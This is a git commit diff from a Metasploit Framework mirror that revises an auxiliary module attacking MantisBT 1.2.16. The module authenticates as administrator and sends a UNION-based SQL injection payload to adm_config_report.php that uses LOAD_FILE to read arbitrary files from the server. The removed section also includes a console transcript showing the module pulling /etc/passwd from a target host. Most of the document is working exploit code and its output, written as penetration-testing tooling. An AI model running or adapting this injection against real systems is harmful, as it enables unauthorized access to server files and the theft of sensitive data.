infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

updates regarding PR comments

bug/bundler_fix
Brandon Perry 2014-03-04 10:08:31 -08:00
parent a3523bdcb9
commit 2b06791ea6
1 changed files with 32 additions and 108 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

140
modules/auxiliary/gather/mantisbt_admin_sqli.rb
View File

@ -1,13 +1,11 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
## This module requires Metasploit: http//metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
class Metasploit4 < Msf::Auxiliary
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
@ -60,121 +58,47 @@ class Metasploit3 < Msf::Auxiliary
'vars_post' => post
})
if !resp or !resp.body
fail_with("Error in server response. Ensure the server IP is correct.")
end
cookie = resp.get_cookies
if cookie == ''
fail_with("Authentication failed")
end
filepath = datastore['FILEPATH'].unpack("H*")[0]
payload = "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-7856%27"
payload << "+UNION+ALL+SELECT+11%2C11%2C11%2C11%2CCONCAT%280x71676a7571%2CIFNULL%28CAST%28HEX%28LOAD_FILE"
payload << "%280x#{filepath}%29%29+AS+CHAR%29%2C0x20%29%2C0x7169727071%29%2C11%23&apply_filter_button=Apply+Filter"
resp = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/adm_config_report.php'),
'method' => 'POST',
'data' => "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-7856%27+UNION+ALL+SELECT+11%2C11%2C11%2C11%2CCONCAT%280x71676a7571%2CIFNULL%28CAST%28HEX%28LOAD_FILE%280x#{filepath}%29%29+AS+CHAR%29%2C0x20%29%2C0x7169727071%29%2C11%23&apply_filter_button=Apply+Filter",
'data' => payload,
'cookie' => cookie,
})
resp.body =~ /qgjuq(.*)qirpq/
if !resp or !resp.body
fail_with("Error in server response")
end
file = [$1].pack("H*")
#qgjuq is prepended to the result of the sql injection
#qirpq is appended to the result of the sql injection
#This allows the use of a simple regex to grab the contents
#of the file easily from the page source.
file = /qgjuq(.*)qirpq/.match(resp.body)
file = file[0].gsub('qgjuq', '').gsub('qirpq', '')
file = [file].pack("H*")
path = store_loot("mantisbt.file", "text/plain", datastore['RHOST'], file, datastore['FILEPATH'])
print_good("File saved to: #{path}")
if path and path != ''
print_good("File saved to: #{path}")
end
end
end
__END__
bperry@ubuntu:~/tools/metasploit-framework$ ./msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
http://metasploit.pro
=[ metasploit v4.8.0-dev [core:4.8 api:1.0]
+ -- --=[ 1178 exploits - 649 auxiliary - 186 post
+ -- --=[ 312 payloads - 30 encoders - 8 nops
msf > use auxiliary/gather/mantisbt_admin_sqli
msf auxiliary(mantisbt_admin_sqli) > set RHOST 172.31.16.109
RHOST => 172.31.16.109
msf auxiliary(mantisbt_admin_sqli) > set TARGETURI /mantisbt-1.2.16/
TARGETURI => /mantisbt-1.2.16/
msf auxiliary(mantisbt_admin_sqli) > set PASSWORD password
PASSWORD => password
msf auxiliary(mantisbt_admin_sqli) > show options
Module options (auxiliary/gather/mantisbt_admin_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
FILE /etc/passwd yes Path to remote file
PASSWORD password yes Single password
Proxies no Use a proxy chain
RHOST 172.31.16.109 yes The target address
RPORT 80 yes The target port
TARGETURI /mantisbt-1.2.16/ yes Relative URI of MantisBT installation
USERNAME administrator yes Single username
VHOST no HTTP server virtual host
msf auxiliary(mantisbt_admin_sqli) > run
[+] root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
bperry:x:1000:1000:Brandon Perry,,,:/home/bperry:/bin/bash
avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
dnsmasq:x:105:65534:dnsmasq,,,:/var/lib/misc:/bin/false
whoopsie:x:106:114::/nonexistent:/bin/false
avahi:x:107:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:111:121:RealtimeKit,,,:/proc:/bin/false
saned:x:112:122::/home/saned:/bin/false
speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
lightdm:x:114:123:Light Display Manager:/var/lib/lightdm:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false
[*] Auxiliary module execution completed
msf auxiliary(mantisbt_admin_sqli) >